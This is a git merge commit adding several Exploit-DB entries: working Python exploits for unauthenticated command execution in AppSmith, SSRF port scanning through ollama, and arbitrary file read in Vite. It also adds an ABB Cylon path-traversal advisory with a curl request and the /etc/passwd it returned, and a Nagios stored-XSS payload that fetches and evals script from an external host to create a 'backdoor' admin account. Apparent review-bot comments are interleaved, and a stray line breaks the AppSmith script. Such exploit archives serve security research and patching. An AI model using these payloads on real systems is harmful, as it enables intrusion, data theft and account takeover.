Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-05 00:01:12 +00:00
commit 9d894f7173
10 changed files with 930 additions and 70 deletions

exploits/java/webapps/52118.py Executable file

@ -0,0 +1,409 @@
# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE)
# Original Author: Rhino Security Labs
# Exploit Author: Nishanth Anand
# Exploit Date: April 2, 2025
# Vendor Homepage: https://www.appsmith.com/
# Software Link: https://github.com/appsmithorg/appsmith
# Version: Prior to v1.52
# Tested Versions: v1.47
# CVE ID: CVE-2024-55963
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, Database
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system.
import requests
import json
import pyfiglet
import argparse
# Create a banner using pyfiglet
banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title
print(banner)
# Set up argument parser
parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept')
parser.add_argument('-u', '--url', required=True, help='Base URL of the target')
parser.add_argument('command', nargs='?', default='id', help='Command to execute')
args = parser.parse_args()
# Get the base URL and command from the parsed arguments
base_url = args.url
command_arg = args.command
if not base_url.startswith("http://") and not base_url.startswith("https://"):
base_url = "http://" + base_url
# Signup request
signup_url = f"{base_url}/api/v1/users"
signup_data = {
"email": "poc1@poc.com",
"password": "Testing123!"
}
print('Signing up...')
signup_response = requests.post(signup_url, data=signup_data)
signup_response.raise_for_status()
# Login request
login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed
login_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/user/login",
"Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed",
}
login_data = {
"username": "poc1@poc.com", # Adjusted to match the provided request
"password": "Testing123!"
}
# Make the login request without following redirects
print('Logging in...')
login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False)
login_response.raise_for_status()
# Capture the 'Set-Cookie' header if it exists
set_cookie = login_response.headers.get('Set-Cookie')
if set_cookie:
# Split the Set-Cookie header to get the cookie name and value
cookie_name, cookie_value = set_cookie.split(';')[0].split('=')
# Fourth request to create a new workspace
print('Creating a new workspace...')
if set_cookie:
fourth_request_url = f"{base_url}/api/v1/workspaces"
fourth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Connection": "keep-alive",
"Referer": f"{base_url}/applications",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
fourth_request_data = json.dumps({"name": "Untitled workspace 3"})
fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data)
fourth_response.raise_for_status()
# Extract the 'id' from the response if it exists
try:
response_json = fourth_response.json()
workspace_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging
if workspace_id:
fifth_request_url = f"{base_url}/api/v1/applications"
fifth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Content-Length": "161",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/applications?workspaceId={workspace_id}",
"Cookie": f"{cookie_name}={cookie_value}",
}
fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None})
print('Creating a new application...')
fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data)
fifth_response.raise_for_status()
try:
response_json = fifth_response.json()
application_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fifth_response.text)
# Sixth request to get workspace details
if workspace_id:
sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}"
sixth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting workspace details...')
sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers)
sixth_response.raise_for_status()
# Extract all plugin IDs from the response
try:
response_json = sixth_response.json()
plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])]
# Loop through each plugin ID for the seventh request
print(f'Searching for vulnerable postgres database...')
for plugin_id in plugin_ids:
# Seventh request to get the form data for the plugin
seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form"
seventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW",
"Cookie": f"{cookie_name}={cookie_value}",
}
try:
seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers)
seventh_response.raise_for_status()
# Extracting the port value from the seventh response
try:
seventh_response_json = seventh_response.json()
if 'data' in seventh_response_json and 'form' in seventh_response_json['data']:
form_data = seventh_response_json['data']['form']
if any("postgres" in str(item) for item in form_data):
print(f"Vulnerable postgres database found.")
break
else:
pass
except (ValueError, IndexError) as e:
pass
except requests.exceptions.HTTPError as e:
print(f"Error checking plugin {plugin_id}: {e}")
continue
# Proceed to request 8 after finding "postgres"
# Proceed to request 8 after finding "postgres"
if "postgres" in str(seventh_response_json):
try:
# Try the environments API endpoint
eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true"
eighth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting the workspace details...')
eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers)
eighth_response.raise_for_status()
# Extracting the workspace ID from the eighth response
try:
eighth_response_json = eighth_response.json()
workspace_data = eighth_response_json.get("data", [{}])[0]
workspace_id_value = workspace_data.get("id")
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text)
except requests.exceptions.HTTPError as e:
# If the environments API fails, use the workspace ID we already have
print(f"Could not fetch environment details: {e}")
print("Using existing workspace ID for datasource creation...")
workspace_id_value = workspace_id
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text)
# After the eighth request to get workspace details
if workspace_id_value:
ninth_request_url = f"{base_url}/api/v1/datasources"
ninth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195",
"Cookie": f"{cookie_name}={cookie_value}",
}
ninth_request_data = {
"pluginId": plugin_id,
"datasourceStorages": {
workspace_id_value: {
"datasourceConfiguration": {
"properties": [None, {"key": "Connection method", "value": "STANDARD"}],
"connection": {
"mode": "READ_WRITE",
"ssl": {"authType": "DEFAULT"}
},
"endpoints": [{"port": "5432", "host": "localhost"}],
"sshProxy": {"endpoints": [{"port": "22"}]},
"authentication": {
"databaseName": "postgres",
"username": "postgres",
"password": "postgres"
}
},
"datasourceId": "",
"environmentId": workspace_id_value,
"isConfigured": True
}
},
"name": "Untitled datasource 1",
"workspaceId": workspace_id
}
print('Connecting to vulnerable postgres database...')
ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data)
ninth_response.raise_for_status()
# Extracting the ID from the response
try:
ninth_response_json = ninth_response.json()
datasource_id = ninth_response_json.get("data", {}).get("id")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text)
# After the ninth request to create the datasource
if datasource_id:
# 10th Request
tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
tenth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
tenth_request_data = {
"title": "SELECT",
"body": "create table poc (column1 TEXT);",
"suggested": True
}
print("Creating the table 'poc'...")
tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data)
tenth_response.raise_for_status()
# 11th Request
eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
eleventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
eleventh_request_data = {
"title": "SELECT",
"body": f"copy poc from program '{command_arg}';",
"suggested": True
}/CVE-2024-55963-Appsmith-RCE
print("Running command...")
eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data)
eleventh_response.raise_for_status()
# 12th Request
twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
twelfth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for the 12th schema preview
twelfth_request_data = {
"title": "SELECT",
"body": "select * from poc;",
"suggested": True
}
# Print statement before the 12th request
print("Reading command output from poc table...\n")
# Make the POST request for the 12th schema preview
twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data)
# Extracting and printing the response from the 12th schema preview
try:
twelfth_response_json = twelfth_response.json()
# Extracting the specific data
body_data = twelfth_response_json.get("data", {}).get("body", [])
column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values
print("Command output:")
print("----------------------------------------")
for value in column1_values:
print(value) # Print each column1 value
print("----------------------------------------\n")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging
# Cleanup Request
cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
cleanup_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for cleanup
cleanup_request_data = {
"title": "SELECT",
"body": "DROP TABLE poc;", # Command to drop the table
"suggested": True
}
# Make the POST request for the cleanup
print('\nDropping the table...')
cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)
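Review bot: `set_cookie.split(';')[0].split('=')` at the login step unpacks into exactly two names, so a session cookie whose value itself contains `=` raises ValueError; `split('=', 1)` is the safe form. When the response carries no `Set-Cookie` header, `cookie_name` and `cookie_value` are never bound yet every later header dict reads them, and the same unbound-name problem applies to `workspace_id`, `seventh_response_json`, `workspace_id_value` and `datasource_id`, which are only assigned on the success path of their `try` blocks, so a non-JSON response produces a NameError instead of the intended "not valid JSON" message — initialise each to `None` before its `try`. The line `}/CVE-2024-55963-Appsmith-RCE` closing `eleventh_request_data` looks like a stray suffix from the page render; if it is really in the file the script does not parse. The cleanup step only drops the `poc` table, while the signup account, workspace, application and datasource created earlier remain on the target, which the header comment should state so that anyone running it against a test system knows what to remove afterwards.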


@ -0,0 +1,63 @@
# Exploit Title: ollama 0.6.4 - SSRF
# Date: 2025-04-03
# Exploit Author: sud0
# Vendor Homepage: https://ollama.com/
# Software Link: https://github.com/ollama/ollama/releases
# Version: <=0.6.4
# Tested on: CentOS 8
import argparse
import requests
import json
from urllib.parse import urljoin
def check_port(api_base, ip, port):
api_endpoint = api_base.rstrip('/') + '/api/create'
model_path = "mynp/model:1.1"
target_url = f"https://{ip}:{port}/{model_path}"
payload = {
"model": "mario",
"from": target_url,
"system": "You are Mario from Super Mario Bros."
}
try:
response = requests.post(api_endpoint, json=payload, timeout=10, stream=True)
response.raise_for_status()
for line in response.iter_lines():
if line:
try:
json_data = json.loads(line.decode('utf-8'))
if "error" in json_data and "pull model manifest" in json_data["error"]:
error_msg = json_data["error"]
model_path_list = model_path.split(":", 2)
model_path_prefix = model_path_list[0]
model_path_suffix = model_path_list[1]
model_path_with_manifests = f"{model_path_prefix}/manifests/{model_path_suffix}"
if model_path_with_manifests in error_msg:
path_start = error_msg.find(model_path_with_manifests)
result = error_msg[path_start+len(model_path_with_manifests)+3:] if path_start != -1 else ""
print(f"Raw Response: {result}")
if "connection refused" in error_msg.lower():
print(f"[!] Port Closed - {ip}:{port}")
else:
print(f"[+] Port Maybe Open - {ip}:{port}")
return
except json.JSONDecodeError:
continue
print(f"[?] Unkown Status - {ip}:{port}")
except requests.exceptions.RequestException as e:
print(f"[x] Execute failed: {str(e)}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ollama ssrf - port scan")
parser.add_argument("--api", required=True, help="Ollama api url")
parser.add_argument("-i", "--ip", required=True, help="target ip")
parser.add_argument("-p", "--port", required=True, type=int, help="target port")
args = parser.parse_args()
check_port(args.api, args.ip, args.port)
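Review bot: The slice `error_msg[path_start+len(model_path_with_manifests)+3:]` in check_port relies on an unexplained `+3` offset, and the `if path_start != -1` guard on the same line is dead because the branch is only entered after `model_path_with_manifests in error_msg` has already matched; a comment such as `# +3 skips the separator that follows the path in the error text — TODO confirm against the server's message format` would make the intent checkable. `urljoin` is imported but never used, and the status message `[?] Unkown Status` should read `Unknown`. check_port has no docstring; a one-line summary stating that it submits an `/api/create` request whose `from` field points at `ip:port` and classifies the returned error text would help, with a note that the classification is heuristic and the "Maybe Open" result is not a confirmed open port.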


@ -0,0 +1,77 @@
# Exploit Title: Vite Arbitrary File Read - CVE-2025-30208
# Date: 2025-04-03
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://vitejs.dev/
# Software Link: https://github.com/vitejs/vite
# Version: <= 6.2.2, <= 6.1.1, <= 6.0.11, <= 5.4.14, <= 4.5.9
# Tested on: Ubuntu
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-30208
# https://github.com/advisories/GHSA-x574-m823-4x7w
# CVE : CVE-2025-30208
"""
################
# Description #
################
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
"""
import requests
import argparse
import urllib3
from colorama import Fore, Style
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_vulnerability(target, file_path, verbose=False, output=None):
url = f"{target}{file_path}?raw"
print(f"{Fore.CYAN}[*] Testing: {url}{Style.RESET_ALL}")
try:
response = requests.get(url, timeout=5, verify=False) # Ignore SSL verification
if response.status_code == 200 and response.text:
vuln_message = f"{Fore.GREEN}[+] Vulnerable : {url}{Style.RESET_ALL}"
print(vuln_message)
if verbose:
print(f"\n{Fore.YELLOW}--- File Content Start ---{Style.RESET_ALL}")
print(response.text[:500]) # Print first 500 characters for safety
print(f"{Fore.YELLOW}--- File Content End ---{Style.RESET_ALL}\n")
if output:
with open(output, 'a') as f:
f.write(f"{url}\n")
else:
print(f"{Fore.RED}[-] Not vulnerable or file does not exist: {url}{Style.RESET_ALL}")
except requests.exceptions.RequestException as e:
print(f"{Fore.YELLOW}[!] Error testing {url}: {e}{Style.RESET_ALL}")
def check_multiple_domains(file_path, file_to_read, verbose, output):
try:
with open(file_to_read, 'r') as file:
domains = file.readlines()
for domain in domains:
domain = domain.strip()
if domain:
check_vulnerability(domain, file_path, verbose, output)
except FileNotFoundError:
print(f"{Fore.RED}[!] Error: The file '{file_to_read}' does not exist.{Style.RESET_ALL}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-30208 - Vite Arbitrary File Read")
parser.add_argument("target", nargs="?", help="Target URL (e.g., http://localhost:5173)")
parser.add_argument("-l", "--list", help="File containing list of domains")
parser.add_argument("-f", "--file", default="/etc/passwd", help="File path to read (default: /etc/passwd)")
parser.add_argument("-v", "--verbose", action="store_true", help="Show file content if vulnerable")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
args = parser.parse_args()
if args.list:
check_multiple_domains(args.file, args.list, args.verbose, args.output)
elif args.target:
check_vulnerability(args.target, args.file, verbose=args.verbose, output=args.output)
else:
print(f"{Fore.RED}Please provide a target URL or a domain list file.{Style.RESET_ALL}")
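Review bot: In check_multiple_domains the parameters `file_path` and `file_to_read` are easy to confuse — the first is the path requested on the target and the second is the local list of hosts — and the positional call `check_multiple_domains(args.file, args.list, args.verbose, args.output)` in `__main__` inherits that ambiguity; renaming the second to `domain_list` or passing both as keywords, as the other call does, would remove it. Neither function has a docstring; check_vulnerability's should state that it treats any HTTP 200 with a non-empty body as a positive, which is a weak signal, so reported hits need manual confirmation before being acted on. Both `open(...)` calls omit `encoding=`, so reading the domain list and writing the output file depend on the locale; `open(file_to_read, 'r', encoding='utf-8')` and `open(output, 'a', encoding='utf-8')` make that explicit.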


@ -0,0 +1,106 @@
ABB Cylon Aspect 3.07.02 (downloadDb.php) Authenticated File Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh


@ -0,0 +1,74 @@
# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin)
# Date: 2025-04-02
# Exploit Author: Seth Kraft
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602
# CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H)
# Type: Stored Cross-Site Scripting (XSS), Privilege Escalation
# Exploit Risk: Critical
# Disclosure
For research and authorized testing only. Do not use against systems without permission.
# Description:
A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject
malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs,
the script executes, resulting in privilege escalation via unauthorized admin account creation.
The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations.
# PoC
1. Log in as a standard (non-admin) user.
2. Navigate to the profile update endpoint:
http://<target-ip>/nagioslogserver/profile/update
3. Inject the following payload into the email field:
```javascript
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
.then(response => response.text())
.then(scriptText => eval(scriptText))
.catch(console.error);
</script>
```
4. Host the xss.js payload on your external server with the following content:
```javascript
(function() {
var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
if (!csrfTokenMatch) return;
var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
var requestBody = "csrf_ls=" + csrfToken +
"&name=backdoor" +
"&email=hacker@example.com" +
"&username=backdoor" +
"&password=Password123!" +
"&password2=Password123!" +
"&auth_type=admin" +
"&apiaccess=1" +
"&language=en_US" +
"&account_type=local";
fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: requestBody
})
.then(response => response.text())
.then(console.log)
.catch(console.error);
})();
```
5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account:
Username: backdoor
Password: Password123!

exploits/perl/webapps/52114.py Executable file

@ -0,0 +1,54 @@
# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
